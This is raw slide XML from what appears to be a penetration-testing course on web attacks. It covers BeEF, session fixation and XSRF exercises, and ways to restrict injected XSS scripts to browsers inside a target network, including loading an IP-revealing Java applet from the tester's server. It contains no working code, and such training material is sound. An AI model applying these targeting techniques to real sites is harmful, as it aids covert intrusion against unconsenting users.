              </a:rPr>
              <a:t> BeEF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> BeEF Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Limiting XSS targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Session Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Session Fixation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> XSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> MonkeyFist Exercise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Putting It Together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Attack Scenario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Next Steps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Conclusions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150534" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3275013" y="152400"/>
            <a:ext cx="2287587" cy="6324600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1426"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1426"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1426"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1426"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1426"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1426 w 1426"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1426" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="3412"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1426" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1426" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3412"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">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139910"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Limiting Targets of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>XSS Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151555" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1371600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As pen testers, we don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t want our injected scripts to run on just any browser that accesses our content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We want to ensure that the XSS runs on a machine within the target network IP address range</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>How can we add intelligence to our script delivery method to control which browsers the injected scripts will run in?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Five possibilities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>1) Client-side code with Java Applet identifying IP addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>2) Client-side code with pen tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s server identifying IP addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>3) Server-side code on target server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>4) Server-side code on pen tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>5) Pen tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s infrastructure configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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685800" y="-76200"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>1) Client-Side Code with Java Applet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4103" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="304800" y="933450"/>
            <a:ext cx="8610600" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>XSS code is injected into web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Runs on target browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>JavaScript loads Java Applet from Pen Tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>MyAddress.class by Lars Kinderman is one example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This applet determines IP address of machine on which it executes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4098" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6553200" y="4572000"/>
          <a:ext cx="857250" cy="898525"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s289935" name="Clip" r:id="rId4" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId4" imgW="3135086" imgH="3278319"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572000"/>
                        <a:ext cx="857250" cy="8985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4099" name="Object 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5837238" y="3062288"/>
          <a:ext cx="862012" cy="900112"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s289936" name="Clip" r:id="rId6" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="3135086" imgH="3278319" progId="">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7238" y="3062288"/>
                        <a:ext cx="862012"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4104" name="Group 6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="4191000"/>
            <a:ext cx="885825" cy="1301750"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="4101" name="Object 5"/>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89937" name="Clip" r:id="rId7" imgW="3135086" imgH="3278319" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId7" imgW="3135086" imgH="3278319"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42" name="Rectangle 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4143" name="Group 9"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4144" name="Freeform 1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5" name="Freeform 1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6" name="Freeform 1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7" name="Freeform 1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8" name="Freeform 1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9" name="Freeform 1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0" name="Freeform 1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1" name="Freeform 1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2" name="Freeform 1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3" name="Freeform 1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4" name="Freeform 2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5" name="Freeform 2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6" name="Freeform 2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7" name="Freeform 2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8" name="Freeform 2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59" name="Freeform 2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60" name="Freeform 2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61" name="Freeform 2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62" name="Freeform 2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63" name="Freeform 2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64" name="Freeform 3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65" name="Freeform 3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66" name="Freeform 3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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4105" name="Group 33"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="2895600"/>
            <a:ext cx="885825" cy="1301750"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="4100" name="Object 4"/>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89938" name="Clip" r:id="rId8" imgW="3135086" imgH="3278319" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId8" imgW="3135086" imgH="3278319"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17" name="Rectangle 35"/>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4118" name="Group 36"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4119" name="Freeform 37"/>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0" name="Freeform 38"/>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1" name="Freeform 39"/>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2" name="Freeform 40"/>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3" name="Freeform 41"/>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4" name="Freeform 42"/>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5" name="Freeform 43"/>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6" name="Freeform 44"/>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7" name="Freeform 45"/>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8" name="Freeform 46"/>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29" name="Freeform 47"/>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0" name="Freeform 48"/>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1" name="Freeform 49"/>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2" name="Freeform 50"/>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3" name="Freeform 51"/>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4" name="Freeform 52"/>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5" name="Freeform 53"/>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6" name="Freeform 54"/>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7" name="Freeform 55"/>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8" name="Freeform 56"/>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39" name="Freeform 57"/>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0" name="Freeform 58"/>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141" name="Freeform 59"/>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4106" name="Text Box 60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7242175" y="4648200"/>
            <a:ext cx="792163"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br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4107" name="Text Box 61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="4724400"/>
            <a:ext cx="6350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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Tester</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4108" name="Text Box 62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6675438" y="3214688"/>
            <a:ext cx="1041400"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p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4109" name="Text Box 63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1273175" y="3316288"/>
            <a:ext cx="1089025"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 Tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>'s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4110" name="Freeform 64"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="965200" y="3657600"/>
            <a:ext cx="4978400" cy="1435100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 904"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 904"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 904"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 3136"/>
              <a:gd name="T7" fmla="*/ 0 h 904"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 3136"/>
              <a:gd name="T13" fmla="*/ 0 h 904"/>
              <a:gd name="T14" fmla="*/ 3136 w 3136"/>
              <a:gd name="T15" fmla="*/ 904 h 904"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="3136" h="904">
                <a:moveTo>
                  <a:pt x="208" y="816"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="860"/>
                  <a:pt x="0" y="904"/>
                  <a:pt x="256" y="816"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="512" y="728"/>
                  <a:pt x="1264" y="424"/>
                  <a:pt x="1744" y="288"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2224" y="152"/>
                  <a:pt x="2680" y="76"/>
                  <a:pt x="3136" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:schemeClr val="accent2"/>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4111" name="Text Box 65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
